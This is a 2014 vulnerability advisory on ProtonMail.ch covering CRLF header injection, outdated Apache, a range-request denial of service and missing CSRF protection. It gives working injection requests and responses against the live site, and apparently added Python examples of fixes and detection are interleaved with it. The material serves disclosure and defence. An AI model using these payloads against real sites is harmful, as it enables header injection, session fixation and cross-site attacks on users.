ProtonMail.ch Header Injection / CSRF
Posted May 30, 2014
Authored by Juan Carlos Garcia, Francisco Moraga

ProtonMail.ch suffers from cross site request forgery, header injection, and out of date software vulnerabilities. Note that this finding houses site-specific data.

tags | exploit, vulnerability, csrf
SHA-256 | 3d088ba11847cc70c4f57d4cfaf4266199b8c8da68a1d4fbf240d3513b40af99

Security Advisory
----------------


Time Line Vulnerability
-------------------------------

-Day 05-05-2014: Security advisory sent => No response
-Days 08, 12, 19-05-2014: Multiple advisories sent => No response
-Day 20-05-2014: Full disclosure



Alerts summary
********************


-CRLF injection / HTTP response splitting
 /crypt/cryptographp.php (parameter: cfg)

-Apache 2.x version older than 2.2.6
 Web Server

-Apache 2.x version older than 2.2.8
 Web Server

-Apache 2.x version older than 2.2.9
 Web Server

-Apache httpd remote denial of service
 Web Server

-HTML form without CSRF protection
 /blog
 /blog/transparency-report
 /blog/wp-login.php
 /blog/wp-login.php (cac6435f6386a7a635b3f12aeb81195e)
 /crypt
 /lander
 /login.php
 /report_bug.php
 /sign_up.php

-Apache 2.x version older than 2.2.10
 Web Server

-Clickjacking: X-Frame-Options header missing
 Web Server

-Sensitive page could be cached
 /sign_up.php (a18aae949b9855b60506dc83164afe7f)

-Session Cookie without HttpOnly flag set
 /

-TRACE method is enabled
 Web Server

-Broken links
 /css/bootstrap.css
 /css/bs.css
 /pages/contact_us.php
 /pages/mit_license.php

-Password type input with autocomplete enabled
 /blog/wp-login.php




I. VULNERABILITY
-------------------------


The ASAP-Sec penetration testers describe below the faults listed in the title.


#Title: ProtonMail.ch suffers from CRLF injection / HTTP response
splitting, Apache 2.x version older than 2.2.6 / 2.2.8 / 2.2.9 / 2.2.10,
httpd remote DoS and CSRF


#Vendor: https://protonmail.ch:443/

#Author: Juan Carlos García and Francisco Moraga

#Follow us: http://www.highsec.es ||| Twitter: @secnight / @btshell1





II. DESCRIPTION
-------------------------


-ProtonMail is incorporated in Switzerland and their servers are located
in Switzerland.

-They are outside of US and EU jurisdiction and all user data is
protected by strict Swiss privacy laws.

Because of their end-to-end encryption, they state that:

"Your data is already secure and encrypted by the time it reaches our
servers. We have no access to your messages, and since we cannot decrypt
them, we cannot share them with third parties".

-ProtonMail's segregated authentication and decryption system means that
logging into a ProtonMail account requires two passwords.

-The first password is used to authenticate the user and retrieve the
correct account. After that, encrypted data is sent to the user.

-The second password is a decryption password which is never sent to us.
It is used to decrypt the user's data in the browser so we never have
access to the decrypted data or the decryption password.

-For this reason, we are also unable to do password recovery.

-If you forget your decryption password, we cannot recover your data.




By the way, ASAP-SEC is verifying this information... Let's get down to
business ;)





III. VULNERABILITIES
---------------------


CRLF injection / HTTP response splitting
****************************************


This script is possibly vulnerable to CRLF injection attacks.

HTTP headers have the structure "Key: Value", where each line is
separated by the CRLF combination. If user input is injected into the
value section without properly escaping/removing CRLF characters, it is
possible to alter the HTTP header structure.

HTTP Response Splitting is a "new" application attack technique which
enables various new attacks such as web cache poisoning, cross-user
defacement, hijacking pages with sensitive user information and
cross-site scripting (XSS).

The attacker sends a single HTTP request that forces the web server to
form an output stream, which is then interpreted by the target as two
HTTP responses instead of one response.


Affected items
------------------

/crypt/cryptographp.php



The impact of this vulnerability
----------------------------------

It is possible for a remote attacker to inject custom HTTP headers.
For example, an attacker can inject session cookies or HTML code.
This may lead to vulnerabilities like XSS (cross-site scripting) or
session fixation.




How to fix this vulnerability
------------------------------------


You need to restrict CR (0x0D, decimal 13) and LF (0x0A, decimal 10)
in the user input, or properly encode the output, in order to prevent
the injection of custom HTTP headers.
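The following is an added example, not code from the advisory or from ProtonMail. It models the weak pattern the capture below suggests (the cfg query parameter copied verbatim into a Location header), then applies the two fixes named above: reject CR/LF in the value, or percent-encode the value for its output context. A lenient header parser shows how the injected line is read as a header of its own, and a small detection check lists header names the application never sets. The response skeleton, the header set and the helper names are assumptions for illustration; the cfg value is the advisory's own, URL-decoded.

```python
import re
from urllib.parse import quote, unquote

# The advisory's URL-encoded cfg value, decoded the way PHP's $_GET would
# decode it: CR, LF, a space, then the fake header line (constructed here).
PAYLOAD = unquote("%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight")

# Assumed: the only headers this redirect script is supposed to emit.
EXPECTED_HEADERS = {"set-cookie", "location", "content-length"}


def has_crlf(value: str) -> bool:
    """True when a header value contains CR, LF or NUL."""
    return re.search(r"[\r\n\x00]", value) is not None


def build_redirect_vulnerable(cfg: str) -> bytes:
    """Weak pattern: the query parameter is copied into the Location header
    verbatim. A CR/LF inside cfg ends the Location line early and whatever
    follows is emitted as a new header line."""
    lines = [
        "HTTP/1.0 302 Found",
        "Set-Cookie: cryptcookietest=1",
        "Location: cryptographp.inc.php?cfg=" + cfg + "&sn=PHPSESSID&",
        "Content-Length: 0",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def reject_crlf(value: str) -> str:
    """Fix, option 1: refuse any header value that contains CR, LF or NUL."""
    if has_crlf(value):
        raise ValueError("CR/LF not allowed in header value")
    return value


def build_redirect_safe(cfg: str) -> bytes:
    """Fix, option 2: the value lands in a URL query string, so percent-encode
    it for that context; CR and LF become %0D%0A and stay inside the Location
    line. reject_crlf() on the finished value is defence in depth."""
    location = "cryptographp.inc.php?cfg=" + quote(cfg, safe="") + "&sn=PHPSESSID&"
    lines = [
        "HTTP/1.0 302 Found",
        "Set-Cookie: cryptcookietest=1",
        "Location: " + reject_crlf(location),
        "Content-Length: 0",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def parse_response_headers(raw: bytes) -> dict:
    """Lenient parse: split the head on CRLF and read 'name: value' per line.
    Leading whitespace is stripped, which is how a lenient client (and the
    advisory's scanner) ends up seeing the injected line as its own header."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.decode("latin-1").split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip():
            headers[name.strip().lower()] = value.strip()
    return headers


def injected_headers(raw: bytes, expected=EXPECTED_HEADERS) -> set:
    """Detection check: header names the application never sets itself."""
    return set(parse_response_headers(raw)) - set(expected)


if __name__ == "__main__":
    print("vulnerable build, unexpected headers:",
          injected_headers(build_redirect_vulnerable(PAYLOAD)))
    print("safe build, unexpected headers:",
          injected_headers(build_redirect_safe(PAYLOAD)))
    print(build_redirect_safe(PAYLOAD).decode("latin-1"))
```

Encoding for the output context is the fix that keeps the redirect working, since cfg is meant to be a query parameter anyway; the reject check is the backstop that catches any other code path writing raw user input into a header.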




Attack details
--------------------

URL encoded GET input cfg was set to (URL-decoded):
<CR><LF> SomeCustomInjectedHeader:injected_by_secnight

Injected header found:
SomeCustomInjectedHeader: injected_by_secnight

GET /crypt/cryptographp.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight





HTTP/1.0 302 Found
Date: Wed, 28 May 2014 15:33:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.28
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cryptcookietest=1
Location: cryptographp.inc.php?cfg=
SomeCustomInjectedHeader: injected_by_secnight&sn=PHPSESSID&
Strict-Transport-Security: max-age=15768000;includeSubDomains
Content-Length: 0
Connection: close
Content-Type: text/html








Variant 1
-----------


GET /crypt/cryptographp.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_asapsec HTTP/1.1
Referer: https://protonmail.ch:443/
Cookie: PHPSESSID=afaj9rt84m3oevgtld6thfe9l4; cryptcookietest=1
Host: protonmail.ch
Connection: Keep-alive


Response
----------


HTTP/1.0 302 Found
Date: Wed, 28 May 2014 15:33:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.28
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cryptcookietest=1
Location: cryptographp.inc.php?cfg=
SomeCustomInjectedHeader: injected_by_wvs&sn=PHPSESSID&
Strict-Transport-Security: max-age=15768000;includeSubDomains
Content-Length: 0
Connection: close
Content-Type: text/html






Apache 2.x version older than 2.2.10
**************************************


Fixed in Apache httpd 2.2.10: mod_proxy_ftp globbing XSS CVE-2008-2939

A flaw was found in the handling of wildcards in the path of a FTP URL
with mod_proxy_ftp.

If mod_proxy_ftp is enabled to support FTP-over-HTTP, requests
containing globbing characters could lead to cross-site scripting (XSS)
attacks.

Affected Apache versions (2.2.9, 2.2.8, 2.2.6, 2.2.5, 2.2.4, 2.2.3,
2.2.2, 2.2.0).




Apache httpd remote denial of service
*************************************


Vulnerability description
------------------------------


A denial of service vulnerability has been found in the way multiple
overlapping ranges are handled by the Apache HTTPD server:

http://seclists.org/fulldisclosure/2011/Aug/175

An attack tool is circulating in the wild, and active use of this tool
has been observed. The attack can be carried out remotely and, with a
modest number of requests, can cause very significant memory and CPU
usage on the server.


Affected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through
2.2.19).



How to fix this vulnerability
-----------------------------
Upgrade to the latest version of Apache HTTP Server (2.2.20 or later),
available from the Apache HTTP Server Project Web site.
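Upgrading is the fix; until that is done, a front end can refuse to pass on the kind of Range header the advisory describes. The following is an added example, not code from the advisory or the Apache project: it parses a byte-range set, resolves it against the body length, and returns a policy of "honour", "drop" (unset the header and serve the full body) or "ignore" (malformed header, serve the full body). The cap of five ranges is an assumed threshold modelled on the workaround rules circulated for CVE-2011-3192; the sample headers are constructed.

```python
import re
from typing import List, Optional, Tuple

# Assumed threshold: the published workaround for CVE-2011-3192 discarded
# Range headers carrying more than a handful of ranges; five is used here.
MAX_RANGES = 5

_RANGE_HEADER = re.compile(r"^\s*bytes\s*=\s*(.*)$", re.IGNORECASE)

RangeSpec = Tuple[Optional[int], Optional[int]]


def parse_byte_ranges(header: str) -> Optional[List[RangeSpec]]:
    """Parse 'bytes=a-b,c-,-d' into (first, last) pairs; None means open end.
    Returns None when the header is not a syntactically valid byte-range
    set, in which case a server should ignore it and send the full body."""
    m = _RANGE_HEADER.match(header)
    if not m:
        return None
    specs: List[RangeSpec] = []
    for part in m.group(1).split(","):
        part = part.strip()
        if not part:
            continue
        first, sep, last = part.partition("-")
        if not sep or not (first or last) or not (first + last).isdigit():
            return None
        specs.append((int(first) if first else None, int(last) if last else None))
    return specs or None


def absolute_ranges(specs: List[RangeSpec], content_length: int) -> List[Tuple[int, int]]:
    """Resolve suffix and open-ended ranges against the body length and drop
    ranges that are unsatisfiable (start past the end, or last < first)."""
    out = []
    for first, last in specs:
        if first is None:                       # suffix range: last N bytes
            start, end = max(0, content_length - last), content_length - 1
        else:
            start = first
            end = content_length - 1 if last is None else min(last, content_length - 1)
        if start <= end:
            out.append((start, end))
    return sorted(out)


def overlapping_pairs(ranges: List[Tuple[int, int]]) -> int:
    """Count adjacent pairs (after sorting) whose byte spans intersect.
    Overlap is what makes the server's per-range buffers add up."""
    return sum(1 for (s1, e1), (s2, e2) in zip(ranges, ranges[1:]) if s2 <= e1)


def range_policy(header: str, content_length: int, max_ranges: int = MAX_RANGES) -> str:
    """Decide how a front end should treat a Range header:
    'ignore' - malformed, serve the whole representation (200)
    'drop'   - too many or overlapping ranges, unset the header, serve 200
    'honour' - a small non-overlapping set the origin can serve as 206"""
    specs = parse_byte_ranges(header)
    if specs is None:
        return "ignore"
    if len(specs) > max_ranges:
        return "drop"
    if overlapping_pairs(absolute_ranges(specs, content_length)) > 0:
        return "drop"
    return "honour"


if __name__ == "__main__":
    # Constructed samples: a normal two-range download, an eight-range
    # request in which every range covers the same bytes, and a non-byte unit.
    for hdr in ("bytes=0-499,1000-1499",
                "bytes=" + ",".join(f"{i}-" for i in range(8)),
                "pages=1-2"):
        print(f"{hdr!r}: {range_policy(hdr, 2000)}")
```

Dropping the header rather than rejecting the request keeps legitimate clients working (they simply receive the full body), which is the same trade-off the upgrade later made by merging overlapping ranges server-side.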





Web references
--------------
CVE-2011-3192








Sensitive page could be cached
******************************


Vulnerability description
-----------------------


This page contains possibly sensitive information (e.g. a password
parameter) and could potentially be cached. Even in secure SSL channels,
sensitive data could be stored by intermediary proxies and SSL
terminators. To prevent this, a Cache-Control header should be specified.

This vulnerability affects /sign_up.php (a18aae949b9855b60506dc83164afe7f).


GET /sign_up.php?username=urvimsoj HTTP/1.1
Pragma: no-cache
Referer: https://protonmail.ch/lander/


Response
----------

HTTP/1.0 200 OK
Date: Sun, 18 May 2014 19:27:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.28
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Strict-Transport-Security: max-age=15768000;includeSubDomains
Connection: close
Content-Type: text/html
Content-Length: 8285
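Several of the alerts summarised at the top of this advisory (cacheable sensitive page, missing X-Frame-Options, session cookie without HttpOnly, outdated Apache banner) are decided purely from response headers. The following is an added example, not the authors' scanner or any ProtonMail code, that runs those checks over constructed copies of the two responses captured in this advisory. Note that the captured /sign_up.php response already carries "Cache-Control: no-store", so the cache check does not fire on it; it does flag the missing X-Frame-Options header and the Apache/2.2.3 banner, and the cookie check flags the cryptcookietest cookie from the /crypt redirect. The minimum Apache version comes from the advisory's own fix advice (2.2.20); the finding keys are an assumption of this example.

```python
import re

# Minimum Apache httpd version the advisory's fix advice names
# (2.2.20 fixed the byte-range DoS; 2.2.10 fixed the mod_proxy_ftp XSS).
MIN_APACHE = (2, 2, 20)

# Constructed copy of the /sign_up.php response captured in the advisory.
SIGNUP_RESPONSE = """HTTP/1.0 200 OK
Date: Sun, 18 May 2014 19:27:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.28
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Strict-Transport-Security: max-age=15768000;includeSubDomains
Connection: close
Content-Type: text/html
Content-Length: 8285
"""

# Constructed copy of the /crypt/cryptographp.php redirect, injection removed.
CRYPT_RESPONSE = """HTTP/1.0 302 Found
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cryptcookietest=1
Location: cryptographp.inc.php?cfg=&sn=PHPSESSID&
Strict-Transport-Security: max-age=15768000;includeSubDomains
Content-Length: 0
"""


def parse_headers(raw: str):
    """Return (name, value) pairs with lower-cased names; status line skipped."""
    pairs = []
    for line in raw.splitlines()[1:]:
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs


def values(headers, name):
    return [v for n, v in headers if n == name]


def cookie_findings(set_cookie: str) -> dict:
    """Flag a cookie sent without the HttpOnly or Secure attribute."""
    parts = [p.strip() for p in set_cookie.split(";")]
    cookie_name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    out = {}
    if "httponly" not in attrs:
        out[f"cookie:{cookie_name}:httponly"] = f"cookie {cookie_name} set without HttpOnly"
    if "secure" not in attrs:
        out[f"cookie:{cookie_name}:secure"] = f"cookie {cookie_name} set without Secure"
    return out


def audit_response(raw: str, sensitive: bool = False) -> dict:
    """Run the header checks behind the advisory's alerts. Keys are stable
    finding identifiers (assumed names); values are short explanations."""
    h = parse_headers(raw)
    findings = {}

    # Sensitive page could be cached: no-store is the directive that tells
    # shared caches and SSL terminators not to keep a copy at all.
    directives = {d.strip().lower() for v in values(h, "cache-control") for d in v.split(",")}
    if sensitive and "no-store" not in directives:
        findings["cacheable"] = "Cache-Control lacks no-store on a page carrying sensitive data"

    # Clickjacking: neither X-Frame-Options nor a CSP frame-ancestors directive.
    csp = " ".join(values(h, "content-security-policy"))
    if not values(h, "x-frame-options") and "frame-ancestors" not in csp:
        findings["clickjacking"] = "no X-Frame-Options / CSP frame-ancestors header"

    # Session cookie without HttpOnly (and Secure, on an HTTPS-only site).
    for sc in values(h, "set-cookie"):
        findings.update(cookie_findings(sc))

    if not values(h, "strict-transport-security"):
        findings["hsts"] = "Strict-Transport-Security header missing"

    # Outdated Apache: the Server banner reports a version below MIN_APACHE.
    for banner in values(h, "server"):
        m = re.search(r"Apache/(\d+)\.(\d+)\.(\d+)", banner)
        if m and tuple(int(x) for x in m.groups()) < MIN_APACHE:
            wanted = ".".join(str(x) for x in MIN_APACHE)
            findings["apache-version"] = f"{banner} is older than {wanted}"

    return findings


if __name__ == "__main__":
    for name, raw, sens in (("/sign_up.php", SIGNUP_RESPONSE, True),
                            ("/crypt/cryptographp.php", CRYPT_RESPONSE, False)):
        print(name)
        for key, msg in audit_response(raw, sensitive=sens).items():
            print(f"  {key}: {msg}")
```

The version check only sees what the banner says; a distribution that backports fixes (the capture shows CentOS) may be patched while still reporting 2.2.3, so treat that finding as a prompt to confirm the actual package version rather than as proof of exposure.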




HTML form without CSRF protection
********************************


Vulnerability description
------------------------------


Cross-site request forgery, also known as a one-click attack or session
riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of
a website whereby unauthorized commands are transmitted from a user that
the website trusts.

The penetration testers (authors) found an HTML form with no apparent
CSRF protection implemented. Consult the details for more information
about the affected HTML form.


Affected items
---------------

/blog
/blog/transparency-report
/blog/wp-login.php
/blog/wp-login.php (cac6435f6386a7a635b3f12aeb81195e)
/crypt
/lander
/login.php
/report_bug.php
/sign_up.php



The impact of this vulnerability
--------------------------------


An attacker may force the users of a web application to execute actions
of the attacker's choosing. A successful CSRF exploit can compromise end
user data and operations in the case of a normal user. If the targeted
end user is the administrator account, this can compromise the entire
web application.




How to fix this vulnerability
-----------------------------


Check if this form requires CSRF protection and implement CSRF
countermeasures if necessary.
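One standard countermeasure is a per-session anti-CSRF token: the server puts a token in every state-changing form and rejects a submission whose token does not match the submitting session. The following is an added example, not code from the advisory or from ProtonMail, using an HMAC-bound token (so the server keeps no per-token state) on a form shaped like the /login.php one listed above, with an Origin header check as an independent second layer. The secret key, session identifiers, the site origin and the helper names are assumptions of this example.

```python
import hashlib
import hmac
import html
import secrets
from typing import Optional, Tuple
from urllib.parse import parse_qs

# Assumption: one server-side secret per deployment, rotated like any key.
SECRET_KEY = secrets.token_bytes(32)


def csrf_token(session_id: str, nonce: Optional[str] = None) -> str:
    """Token = nonce + HMAC(secret, session_id:nonce). Binding the MAC to the
    session means a token minted in an attacker's own session does not
    verify against the victim's, and the server stores nothing per token."""
    nonce = nonce or secrets.token_hex(16)
    mac = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep or not nonce or not mac:
        return False
    expected = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def render_login_form(session_id: str) -> str:
    """A login form of the shape the advisory flags, now carrying a hidden
    token; the password field also disables autocomplete."""
    token = html.escape(csrf_token(session_id), quote=True)
    return (
        '<form method="post" action="/login.php">\n'
        f'  <input type="hidden" name="csrf_token" value="{token}">\n'
        '  <input type="text" name="username">\n'
        '  <input type="password" name="password" autocomplete="off">\n'
        '  <button type="submit">Log in</button>\n'
        '</form>'
    )


def handle_login_post(session_id: str, body: str, origin: Optional[str] = None,
                      site: str = "https://protonmail.ch") -> Tuple[int, str]:
    """Server side of the form: the request is rejected unless the token
    verifies against the caller's own session. When the browser sent an
    Origin header it must match the site as well (independent second layer)."""
    if origin is not None and origin != site:
        return 403, "cross-origin request rejected"
    fields = parse_qs(body)
    token = fields.get("csrf_token", [""])[0]
    if not verify_csrf_token(session_id, token):
        return 403, "CSRF token missing or invalid"
    return 200, "login form accepted"


if __name__ == "__main__":
    sid = "session-of-victim"                 # constructed session identifier
    good = csrf_token(sid)
    print(handle_login_post(sid, "username=a&password=b"))               # forged: no token
    print(handle_login_post(sid, f"username=a&password=b&csrf_token={good}"))  # legitimate
    print(render_login_form(sid))
```

A forged cross-site form post cannot carry a valid token because the attacker's page cannot read the victim's form, and a token the attacker obtained in a session of their own fails the MAC check for any other session.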



CREDITS
-------------------------

This vulnerability has been discovered by Juan Carlos García (@secnight)
and Francisco Moraga (@btshell)




VII. LEGAL NOTICES
-------------------------

The authors accept no responsibility for any damage
caused by the use or misuse of this information.
